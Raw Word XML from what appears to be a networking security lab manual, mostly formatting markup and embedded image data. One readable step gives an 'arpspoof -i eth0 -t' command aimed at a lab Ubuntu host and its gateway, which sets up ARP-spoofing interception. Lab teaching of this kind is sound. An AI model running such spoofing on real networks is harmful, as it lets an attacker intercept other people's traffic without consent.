HJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId58" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2728" o:spid="_x0000_s1186" style="position:absolute;left:256;top:1735;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AWtwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFHrTTWJRia5BrC0eoxaKtyE7JsHsbMhuk/Tfdw+Cx8f73mSjaURPnastK4hnEQjiwuqa&#10;SwXfl8/pCoTzyBoby6Tgjxxk25fJBlNtBz5Rf/alCCHsUlRQed+mUrqiIoNuZlviwN1sZ9AH2JVS&#10;dziEcNPIJIoW0mDNoaHClvYVFffzr1FwGJIff82/7qv4ZnX7Xn7wPL8o9fY67tYgPI3+KX64j1pB&#10;skzC3PAmPAG5/QcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQArpAWtwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E42039" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B5109D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B0BB5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D1331" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA622FA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98CB68" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC00E8D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> spoof interface </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFB12C9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0 -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">t  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> address ubuntu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> address gateway </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C8183" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To get gateway use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> route | grep default </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D145EC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EEA6574" wp14:editId="01430410">
                <wp:extent cx="5986577" cy="3568468"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40325" name="Group 40325"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3568468"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3568468"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2808" name="Rectangle 2808"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3254676"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="08A271CC"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09" name="Rectangle 2809"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3419268"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="68030DD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822" name="Picture 2822"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId59"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3314066"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2823" name="Shape 2823"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="0"/>
                            <a:ext cx="5899150" cy="3339466"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5899150" h="3339466">
                                <a:moveTo>
                                  <a:pt x="0" y="3339466"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5899150" y="3339466"/>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EA6574" id="Group 40325" o:spid="_x0000_s1187" style="width:471.4pt;height:281pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59865,356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ZMMDAQQAAO8LAAAOAAAAZHJzL2Uyb0RvYy54bWzMVtuO2zYQfS/Q&#10;fxD0nrUt+SIL6w2KbLMIUDSLXD6ApilLKEUSJH3r13dmSMrOetMNEiDtAiuPxOHwzOHcbl8fe5nt&#10;hXWdVqt8cjPOM6G43nRqu8o/f3r7qsoz55naMKmVWOUn4fLXd7/+cnswtSh0q+VG2AyMKFcfzCpv&#10;vTf1aOR4K3rmbrQRChYbbXvm4dVuRxvLDmC9l6NiPJ6PDtpujNVcOAdf78Nifkf2m0Zw/75pnPCZ&#10;XOWAzdPT0nONz9HdLau3lpm24xEG+w4UPesUHDqYumeeZTvbXZnqO261042/4bof6abpuCAfwJvJ&#10;+Ik3D1bvDPmyrQ9bM9AE1D7h6bvN8j/3D9Z8NI8WmDiYLXBBb+jLsbE9/gLK7EiUnQbKxNFnHD7O&#10;ltV8tljkGYe1cjavpvMqkMpbYP5qH29/f2HnKB08+gLOwUCAuDMH7sc4+NgyI4haVwMHjzbrNqu8&#10;qMYQr4r1EKkfIHaY2kqR0Veih3QHslztgLdnmJotp9OqgHBDTorZdL6YB04G1mazEg5CzibLalrS&#10;8uA4q411/kHoPkNhlVuAQtHF9n84D0hANang8VLhU+m3nZRhFb8AfwkhSv64PpKTC4p6/LTWmxN4&#10;3mr793vI4UbqwyrXUcoxreFwXM0z+U4B45hBSbBJWCfBevlGU54FOL/tvG46wns+LeKCq8R4+zl3&#10;unz2Tpd4JwgB7v/lO423OZ0sixTh/4/bnCQ3/uvbNB2v4T9WKZCuMvTlag67/M6KPBrpv8lGz+xf&#10;O/MKCqphvlt3svMnag6QMwhK7R87jomKL5fJXhQpMEABz4VUh28QFkkT92FG4fsXZtayM5huGOko&#10;R8DQWZ5U5md8DlX/XvNdL5QPbcwKCdi1cm1nXJ7ZWvRrARXJvtvQBbPaeSs8b/HABg7G8hRyfVgg&#10;lGdgiPkrBaqsynFJ5WlSLMaxCw7hXC3KxQzinUp6OZmO5z9UnwhWAEIi4PppqV+Al6GcU8HH+y1T&#10;vnxT2hezeWTqiqXlcnJmqVxOr1jiu1DF8cpS5YYJYRNqOHxrk8SPKolY6/91WIEYx31oFMUMSvas&#10;ilha6DdlgILrPdTyT5o0/bkTJ40QPWcdqS51B5vYw6LNsCPppV9Dti/1iSroUUkj/QbNUEmf6nCp&#10;nQgHoFuhxyVXwdYlmVKh19BYIXQzzmBsbCB7qEPCxKQ2CedVD3T+JAXyIdUH0UA3hAlmQvuc3a7f&#10;SJvtGTYw+sM4ISdAFfeErIu7xl/dhapMmpZFW9FMPIBMRkuoKWhGHcBEszyiCYMqjHvgZxpXAdKw&#10;iWBp5Yf9CoZsOhD7WvT23HvRodhzSaKpkhDFCRjH1st30jrP6Xf/AAAA//8DAFBLAwQKAAAAAAAA&#10;ACEAJbnPr82DAQDNgwEAFAAAAGRycy9tZWRpYS9pbWFnZTEuanBn/9j/4AAQSkZJRgABAQEAYABg&#10;AAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMU&#10;FRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAIgA8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DNe0b4ceGZrdNQ8P6DayT/6vNhAP&#10;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&#10;xypLHvR/MjoAo2Oh2V